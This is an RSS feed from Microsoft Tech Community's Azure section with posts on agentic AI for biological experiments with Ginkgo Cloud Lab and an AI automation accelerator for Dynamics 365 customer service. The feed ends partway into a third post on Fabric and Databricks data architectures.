<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>rss.livelink.threads-in-node</title>
    <link>https://techcommunity.microsoft.com/t5/azure/ct-p/Azure</link>
    <description>rss.livelink.threads-in-node</description>
    <pubDate>Wed, 10 Jun 2026 00:29:53 GMT</pubDate>
    <dc:creator>Azure</dc:creator>
    <dc:date>2026-06-10T00:29:53Z</dc:date>
    <item>
      <title>Ginkgo Bioworks and Microsoft Discovery: Bringing agentic AI to biological discovery</title>
      <link>https://techcommunity.microsoft.com/t5/azure-infrastructure-blog/ginkgo-bioworks-and-microsoft-discovery-bringing-agentic-ai-to/ba-p/4526550</link>
      <description>&lt;H1&gt;&lt;SPAN class="lia-text-color-21"&gt;Introduction&lt;/SPAN&gt;&lt;/H1&gt;
&lt;P&gt;Biological discovery is inherently iterative and non-linear. Progress comes through cycles of hypothesis, experimentation, refinement, and review across data, tools, and teams. At Microsoft Build 2026, &lt;A href="https://azure.microsoft.com/en-us/blog/announcing-microsoft-discovery-general-availability-and-microsoft-discovery-app-preview/" target="_blank" rel="noopener"&gt;Microsoft announced general availability of &lt;/A&gt;&lt;A href="https://azure.microsoft.com/en-us/blog/announcing-microsoft-discovery-general-availability-and-microsoft-discovery-app-preview/" target="_blank" rel="noopener"&gt;Microsoft Discovery&lt;/A&gt; to support exactly this kind of work, as a comprehensive platform for building and governing agentic AI workflows across scientific and engineering disciplines. That vision becomes especially powerful in collaboration with &lt;A href="https://www.ginkgo.bio/" target="_blank" rel="noopener"&gt;Ginkgo Bioworks&lt;/A&gt;. The goal is to enable researchers to scope and plan experiments in Microsoft Discovery and run them directly on &lt;A href="https://cloud.ginkgo.bio/" target="_blank" rel="noopener"&gt;Ginkgo Cloud Lab&lt;/A&gt;, without requiring in-house automation.&lt;/P&gt;
&lt;P&gt;This collaboration brings together complementary strengths. Microsoft Discovery provides the reasoning, orchestration, and compute layer for scientific work: helping researchers turn goals into structured workflows that connect data, models, tools, and evidence. Ginkgo Bioworks contributes autonomous laboratory infrastructure that can execute those workflows and return results for analysis.&lt;/P&gt;
&lt;P&gt;Together, this creates a lab-in-the-loop model for biological research. This workflow is traditionally described as a continuous Design–Make–Test–Analyze loop, where scientists generate an experiment plan, hand off validated protocols for lab execution, and then learn from the resulting data to inform the next step. Rather than treating experimentation as a disconnected process, the interplay between Microsoft Discovery and Ginkgo agentic system is designed to create a tighter connection between scientific reasoning and real-world validation.&lt;/P&gt;
&lt;H1&gt;&lt;SPAN class="lia-text-color-21"&gt;Integration&lt;/SPAN&gt;&lt;/H1&gt;
&lt;P&gt;One example of this tighter reasoning loop under development is an RNA design-to-data workflow. In this scenario, Microsoft Discovery uses AI agents to help plan and scope the experiment, while Ginkgo’s automated lab synthesizes DNA templates, performs in vitro transcription, purifies, and quantitates yield and purity, and returns the resulting data for downstream analysis. In addition, Ginkgo Cloud Lab provides users with full transparency on the cost of the experiment before any lab experimentation.&amp;nbsp;&lt;/P&gt;
&lt;div data-video-id="https://www.youtube.com/shorts/4b_MCvIqzvE/1780954852794" data-video-remote-vid="https://www.youtube.com/shorts/4b_MCvIqzvE/1780954852794" class="lia-video-container lia-media-is-center lia-media-size-large"&gt;&lt;iframe src="https://www.youtube.com/embed/4b_MCvIqzvE?feature=oembed" allowfullscreen="" style="max-width: 100%"&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;P&gt;Here is a walk-through of a project aiming to estimate the cost of RNA design, illustrating how customers can use Microsoft Discovery with Ginkgo RNA production offering:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Describe the experiment in human language&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt; &lt;/STRONG&gt;Provide any additional information if required&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt; &lt;/STRONG&gt;Validate the cost estimate of the Ginkgo Cloud Lab service&lt;/LI&gt;
&lt;LI&gt;Place the order&lt;/LI&gt;
&lt;LI&gt;Store the results and share&lt;/LI&gt;
&lt;/OL&gt;
&lt;H1&gt;&lt;SPAN class="lia-text-color-21"&gt;Conclusion&lt;/SPAN&gt;&lt;/H1&gt;
&lt;P&gt;This is a real-world Design–Make–Test–Analyze use case that demonstrates how agentic workflows can adapt based on experimental results and accelerate R&amp;amp;D compared with more manual approaches. This matters because modern life sciences teams need more than isolated predictions. They need workflows that connect long term scientific context, biological data, experimental design, and validation while preserving transparency and keeping experts in control. The collaboration with Ginkgo Bioworks extends that approach into biological experimentation. It also reflects a broader principle behind Microsoft Discovery: extensibility. Microsoft Discovery is a platform that can connect Microsoft innovations with partner tools, models, and datasets. In this case, that means pairing Microsoft Discovery’s agentic orchestration with Ginkgo’s autonomous lab execution to support a more connected model for biological discovery.&lt;/P&gt;
&lt;P&gt;&lt;EM&gt;“Together, agentic AI and autonomous labs will change every part of the scientific process. Iteration cycles will get faster, experiments will require less manual hands-on time, and computational analyses will become more systematic and exhaustive. By making both easier to use, Microsoft and Ginkgo aim to bring greater speed, scale and reproducibility to pre-clinical research.”&lt;/EM&gt;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;— Jason Kelly, CEO, Ginkgo Bioworks&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;By connecting agentic AI with autonomous experimentation, Ginkgo Bioworks and Microsoft are working toward a future in which researchers can move faster from hypothesis to insight and do so with greater speed, scale, and reproducibility.&lt;/P&gt;
&lt;P&gt;For more information on Microsoft Discovery, &lt;A href="https://azure.microsoft.com/en-us/solutions/discovery/" target="_blank" rel="noopener"&gt;click here&lt;/A&gt;.&lt;/P&gt;
&lt;P&gt;For more information on Ginkgo Bioworks, &lt;A href="https://www.ginkgo.bio/" target="_blank" rel="noopener"&gt;click here&lt;/A&gt;.&lt;/P&gt;</description>
      <pubDate>Tue, 09 Jun 2026 19:00:00 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-infrastructure-blog/ginkgo-bioworks-and-microsoft-discovery-bringing-agentic-ai-to/ba-p/4526550</guid>
      <dc:creator>NihitPokhrel</dc:creator>
      <dc:date>2026-06-09T19:00:00Z</dc:date>
    </item>
    <item>
      <title>From AI Suggestions to Autonomous CRM Actions in Dynamics 365</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-developer-community/from-ai-suggestions-to-autonomous-crm-actions-in-dynamics-365/ba-p/4524477</link>
      <description>&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H2&gt;🔷 Executive Summary&lt;/H2&gt;
&lt;P&gt;Most AI implementations in Dynamics 365 start—and end—with case summarization.&lt;/P&gt;
&lt;P&gt;While useful, summarization alone does not fundamentally transform service operations.&lt;/P&gt;
&lt;P&gt;In this post, I’ll walk through a &lt;STRONG&gt;CRM Copilot Agent Accelerator&lt;/STRONG&gt; built on Microsoft Power Platform that goes far beyond summarization. It introduces a &lt;STRONG&gt;modular, extensible AI architecture&lt;/STRONG&gt; that evolves from:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;AI-generated insights&lt;/LI&gt;
&lt;LI&gt;to predictive intelligence&lt;/LI&gt;
&lt;LI&gt;to autonomous execution&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This approach enables organizations to reduce manual effort, improve decision quality, and scale support operations without additional Copilot licensing.&lt;/P&gt;
&lt;H2&gt;🔷 The Business Problem&lt;/H2&gt;
&lt;P&gt;In most enterprise service operations:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Agents spend &lt;STRONG&gt;30–40% of their time on repetitive tasks&lt;/STRONG&gt;&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;Case triage requires manual reading of history&lt;/LI&gt;
&lt;LI&gt;Decisions vary significantly between agents&lt;/LI&gt;
&lt;LI&gt;Knowledge base usage is inconsistent&lt;/LI&gt;
&lt;LI&gt;Escalations are reactive rather than predictive&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The result?&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Slower resolutions&lt;/LI&gt;
&lt;LI&gt;Increased SLA breaches&lt;/LI&gt;
&lt;LI&gt;Poor customer experience&lt;/LI&gt;
&lt;LI&gt;High onboarding time for new agents&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;🔷 Solution Overview: CRM Copilot Agent Accelerator&lt;/H2&gt;
&lt;P&gt;The solution introduces a &lt;STRONG&gt;layered AI-first architecture&lt;/STRONG&gt; built on:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Dynamics 365 + Dataverse&lt;/STRONG&gt; (data foundation)&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Power Automate&lt;/STRONG&gt; (orchestration)&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;AI Builder (GPT models)&lt;/STRONG&gt; (intelligence layer)&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;PCF Controls + Teams integration&lt;/STRONG&gt; (user experience)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;At its core, the accelerator:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Generates &lt;STRONG&gt;AI summaries + next actions&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI&gt;Stores them in Dataverse (persistent &amp;amp; reusable)&lt;/LI&gt;
&lt;LI&gt;Extends capabilities through &lt;STRONG&gt;modular add-on packs&lt;/STRONG&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 These add-ons transform AI from a helper into an operational engine.&lt;BR /&gt;&lt;BR /&gt;🔷 Architecture Overview&lt;/P&gt;
&lt;P&gt;The solution follows a &lt;STRONG&gt;layered enterprise architecture model&lt;/STRONG&gt;:&lt;BR /&gt;&lt;BR /&gt;&lt;/P&gt;
&lt;img /&gt;&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H3&gt;1. Trigger Layer&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;Case create/update&lt;/LI&gt;
&lt;LI&gt;Email, chat, or call events&lt;/LI&gt;
&lt;LI&gt;SLA checkpoints&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;2. Orchestration Layer&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;Power Automate flows&lt;/LI&gt;
&lt;LI&gt;Dataverse plugins&lt;/LI&gt;
&lt;LI&gt;Optional Copilot Studio agents&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;3. AI Processing Layer&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;AI Builder prompts (summarization, classification)&lt;/LI&gt;
&lt;LI&gt;Sentiment detection&lt;/LI&gt;
&lt;LI&gt;Risk prediction&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;4. Data Layer&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;Dataverse entities (Case, Account, Knowledge Base)&lt;/LI&gt;
&lt;LI&gt;AI-enriched fields&lt;/LI&gt;
&lt;LI&gt;Analytics tables&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;5. Experience Layer&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;Model-driven apps&lt;/LI&gt;
&lt;LI&gt;PCF widgets&lt;/LI&gt;
&lt;LI&gt;Teams Adaptive Cards&lt;/LI&gt;
&lt;LI&gt;Power BI dashboards&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 This architecture allows &lt;STRONG&gt;scalable AI enrichment across the entire CRM lifecycle&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;🔷 The Real Innovation: Modular Add-On Packs&lt;/H2&gt;
&lt;P&gt;The real differentiation is not the base AI capability.&lt;/P&gt;
&lt;P&gt;It is the introduction of &lt;STRONG&gt;eight independently deployable add-on packs&lt;/STRONG&gt;.&lt;/P&gt;
&lt;H3&gt;🔹 Key Add-On Categories&lt;/H3&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th&gt;Add-On&lt;/th&gt;&lt;th&gt;Capability&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;PCF Widgets&lt;/td&gt;&lt;td&gt;Visual AI insights (risk radar, similar cases)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Predictive Engine&lt;/td&gt;&lt;td&gt;SLA &amp;amp; escalation prediction&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Teams Integration&lt;/td&gt;&lt;td&gt;AI insights pushed to Teams&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Customer 360&lt;/td&gt;&lt;td&gt;Persona + churn intelligence&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Knowledge Intelligence&lt;/td&gt;&lt;td&gt;Self-improving KB loop&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Multilingual AI&lt;/td&gt;&lt;td&gt;Cross-language support&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Voice &amp;amp; Omnichannel&lt;/td&gt;&lt;td&gt;Call/chat AI summarization&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Agentic Automation&lt;/td&gt;&lt;td&gt;AI takes action automatically&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;👉 These packs address &lt;STRONG&gt;10+ gaps not covered by D365 Copilot&lt;/STRONG&gt;&amp;nbsp;&lt;/P&gt;
&lt;H2&gt;🔷 Deep Dive: Key Differentiators&lt;/H2&gt;
&lt;H3&gt;&amp;nbsp;1. From Reactive to Predictive AI&lt;/H3&gt;
&lt;P&gt;Instead of reacting to issues:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;SLA breach risk is calculated in real time&lt;/LI&gt;
&lt;LI&gt;Escalation probability is predicted before it happens&lt;/LI&gt;
&lt;LI&gt;Supervisors receive proactive alerts&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 This reduces escalations by up to &lt;STRONG&gt;25–40%&lt;/STRONG&gt;&amp;nbsp;&lt;/P&gt;
&lt;H3&gt;&amp;nbsp;2. Visual AI Experience (PCF Controls)&lt;/H3&gt;
&lt;img /&gt;
&lt;P&gt;Instead of text-heavy UI:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Radar charts show case complexity &amp;amp; risk&lt;/LI&gt;
&lt;LI&gt;Similar case panels enable faster resolution&lt;/LI&gt;
&lt;LI&gt;Coaching tickers keep guidance always visible&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 This dramatically improves &lt;STRONG&gt;agent usability and adoption&lt;/STRONG&gt;&lt;/P&gt;
&lt;H3&gt;&amp;nbsp;3. Self-Improving Knowledge Base&lt;/H3&gt;
&lt;P&gt;A major gap in most systems:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Knowledge is consumed but never improved&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This solution:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Detects KB gaps automatically&lt;/LI&gt;
&lt;LI&gt;Generates AI-drafted knowledge articles&lt;/LI&gt;
&lt;LI&gt;Enables continuous learning&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 Leads to &lt;STRONG&gt;3× growth in KB coverage&lt;/STRONG&gt;&amp;nbsp;&lt;/P&gt;
&lt;H3&gt;&amp;nbsp;4. From AI Suggestion → AI Action&lt;/H3&gt;
&lt;P&gt;Most AI stops at suggestion.&lt;/P&gt;
&lt;P&gt;This accelerator evolves into &lt;STRONG&gt;Agentic AI&lt;/STRONG&gt;:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th&gt;Stage&lt;/th&gt;&lt;th&gt;Capability&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AI Informs&lt;/td&gt;&lt;td&gt;Summary + Insights&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AI Suggests&lt;/td&gt;&lt;td&gt;Recommendations&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AI Drafts&lt;/td&gt;&lt;td&gt;Email + KB articles&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AI Acts&lt;/td&gt;&lt;td&gt;Tasks, routing, execution&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AI Orchestrates&lt;/td&gt;&lt;td&gt;Multi-agent automation&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;👉 AI starts doing the work — not just guiding it&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H2&gt;🔷 Business Impact&lt;/H2&gt;
&lt;P&gt;Organizations adopting this accelerator can expect:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;✅ &lt;STRONG&gt;90% reduction in case triage time&lt;/STRONG&gt;&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;✅ &lt;STRONG&gt;40% reduction in misrouted cases&lt;/STRONG&gt;&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;✅ &lt;STRONG&gt;60–70% improvement in handling efficiency&lt;/STRONG&gt;&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;✅ Faster agent onboarding (less than a day)&lt;/LI&gt;
&lt;LI&gt;✅ Reduced dependency on Copilot licensing&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 All achieved using &lt;STRONG&gt;existing Power Platform investments&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;🔷 Future Roadmap&lt;/H2&gt;
&lt;P&gt;The current solution sets the foundation for:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;✅ Copilot Studio multi-agent orchestration&lt;/LI&gt;
&lt;LI&gt;✅ Advanced ML-based predictions&lt;/LI&gt;
&lt;LI&gt;✅ Vector-based knowledge retrieval (RAG)&lt;/LI&gt;
&lt;LI&gt;✅ Integration with Microsoft Fabric for intelligence&lt;/LI&gt;
&lt;LI&gt;✅ Autonomous CRM workflows&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;👉 The evolution leads toward &lt;STRONG&gt;fully AI-driven service operations&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;🔷 Why This Matters&lt;/H2&gt;
&lt;P&gt;This is not just another AI demo.&lt;/P&gt;
&lt;P&gt;It represents a shift from:&lt;/P&gt;
&lt;P&gt;❌ “AI helps agents”&lt;BR /&gt;➡️ ✅ “AI becomes part of the operation”&lt;/P&gt;
&lt;P&gt;And does so using:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;No custom AI infrastructure&lt;/LI&gt;
&lt;LI&gt;No additional Copilot licensing&lt;/LI&gt;
&lt;LI&gt;Native Microsoft ecosystem&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;🔷 Call to Action&lt;/H2&gt;
&lt;P&gt;If you’re working on Dynamics 365, Power Platform, or AI-driven CRM solutions:&lt;/P&gt;
&lt;P&gt;✅ Start with AI enrichment&lt;BR /&gt;✅ Extend with predictive capabilities&lt;BR /&gt;✅ Move toward agentic automation&lt;/P&gt;
&lt;P&gt;This accelerator pattern can help you &lt;STRONG&gt;move faster, scale better, and deliver measurable value&lt;/STRONG&gt;.&lt;/P&gt;
&lt;H2&gt;🔷 Closing Thought&lt;/H2&gt;
&lt;P&gt;“The future of CRM is not AI assisting users —&lt;BR /&gt;it is AI transforming how work gets done.”&lt;BR /&gt;&lt;BR /&gt;&lt;/P&gt;
&lt;H2&gt;🔷 References &amp;amp; Further Reading&lt;/H2&gt;
&lt;P&gt;The concepts described in this CRM Copilot Agent Accelerator are built on capabilities available across Microsoft Dynamics 365, Dataverse, Power Platform, Azure AI, and Copilot technologies.&lt;/P&gt;
&lt;P&gt;Official Microsoft references:&lt;/P&gt;
&lt;P&gt;📌 Dynamics 365 Customer Service&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customer-service/?utm_source=chatgpt.com" target="_blank"&gt;Dynamics 365 Customer Service Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customer-service/overview?utm_source=chatgpt.com" target="_blank"&gt;Dynamics 365 Customer Service Overview&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Microsoft Dataverse&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-apps/maker/data-platform/data-platform-intro?utm_source=chatgpt.com" target="_blank"&gt;Microsoft Dataverse Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-apps/developer/data-platform/overview?utm_source=chatgpt.com" target="_blank"&gt;Dataverse Developer Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Power Automate&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-automate/?utm_source=chatgpt.com" target="_blank"&gt;Power Automate Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-automate/getting-started?utm_source=chatgpt.com" target="_blank"&gt;Build Automated Workflows with Power Automate&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 AI Builder&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/ai-builder/?utm_source=chatgpt.com" target="_blank"&gt;AI Builder Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/ai-builder/create-a-custom-prompt?utm_source=chatgpt.com" target="_blank"&gt;Create and Use AI Prompts in Power Platform&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Microsoft Copilot Studio&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/microsoft-copilot-studio/?utm_source=chatgpt.com" target="_blank"&gt;Microsoft Copilot Studio Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/microsoft-copilot-studio/authoring-create-agent?utm_source=chatgpt.com" target="_blank"&gt;Build Autonomous Agents with Copilot Studio&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Power Apps Component Framework (PCF)&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-apps/developer/component-framework/overview?utm_source=chatgpt.com" target="_blank"&gt;Power Apps Component Framework Overview&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-apps/developer/component-framework/create-custom-controls-using-pcf?utm_source=chatgpt.com" target="_blank"&gt;Build Code Components for Model-Driven Apps&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Microsoft Teams Integration&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customerengagement/on-premises/admin/use-dynamics-365-microsoft-teams-collaborate?utm_source=chatgpt.com" target="_blank"&gt;Integrate Dynamics 365 with Microsoft Teams&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/microsoftteams/platform/task-modules-and-cards/cards/cards-reference?utm_source=chatgpt.com" target="_blank"&gt;Teams Adaptive Cards Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Omnichannel &amp;amp; Conversational AI&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/contact-center/?utm_source=chatgpt.com" target="_blank"&gt;Dynamics 365 Contact Center Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customer-service/implement/omnichannel/overview?utm_source=chatgpt.com" target="_blank"&gt;Omnichannel for Customer Service Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Customer Insights &amp;amp; Customer 360&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customer-insights/?utm_source=chatgpt.com" target="_blank"&gt;Dynamics 365 Customer Insights Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Knowledge Management&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/dynamics365/customer-service/knowledge-base-overview?utm_source=chatgpt.com" target="_blank"&gt;Knowledge Management in Dynamics 365 Customer Service&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Power BI Analytics&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-bi/?utm_source=chatgpt.com" target="_blank"&gt;Power BI Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Azure AI &amp;amp; Generative AI&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/azure/ai-services/?utm_source=chatgpt.com" target="_blank"&gt;Azure AI Services Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/azure/ai-services/openai/overview?utm_source=chatgpt.com" target="_blank"&gt;Azure OpenAI Service Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Retrieval-Augmented Generation (RAG)&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/azure/search/search-what-is-azure-search?utm_source=chatgpt.com" target="_blank"&gt;Azure AI Search Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/azure/search/retrieval-augmented-generation-overview?utm_source=chatgpt.com" target="_blank"&gt;Build RAG Solutions with Azure AI Search and Azure OpenAI&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Microsoft Fabric&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/fabric/?utm_source=chatgpt.com" target="_blank"&gt;Microsoft Fabric Documentation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;📌 Power Platform Architecture &amp;amp; Well-Architected Guidance&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-platform/well-architected/?utm_source=chatgpt.com" target="_blank"&gt;Power Platform Well-Architected Framework&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/power-platform/architecture/?utm_source=chatgpt.com" target="_blank"&gt;Power Platform Architecture Center&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;These resources provide the foundational building blocks for implementing AI-assisted, predictive, and agentic experiences across Dynamics 365 Customer Service and the broader Microsoft Power Platform ecosystem.&lt;/P&gt;</description>
      <pubDate>Tue, 09 Jun 2026 16:39:43 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-developer-community/from-ai-suggestions-to-autonomous-crm-actions-in-dynamics-365/ba-p/4524477</guid>
      <dc:creator>SachinDas</dc:creator>
      <dc:date>2026-06-09T16:39:43Z</dc:date>
    </item>
    <item>
      <title>Streaming and Batch Data Architectures with Microsoft Fabric to Azure Databricks</title>
      <link>https://techcommunity.microsoft.com/t5/analytics-on-azure-blog/streaming-and-batch-data-architectures-with-microsoft-fabric-to/ba-p/4526166</link>
      <description>&lt;P&gt;Author's: Oscar Alvarado &lt;a href="javascript:void(0)" data-lia-user-mentions="" data-lia-user-uid="2298967" data-lia-user-login="oscaralvarado" class="lia-mention lia-mention-user"&gt;oscaralvarado​&lt;/a&gt; and Rafia Aqil &lt;a href="javascript:void(0)" data-lia-user-mentions="" data-lia-user-uid="3072440" data-lia-user-login="Rafia_Aqil" class="lia-mention lia-mention-user"&gt;Rafia_Aqil​&lt;/a&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
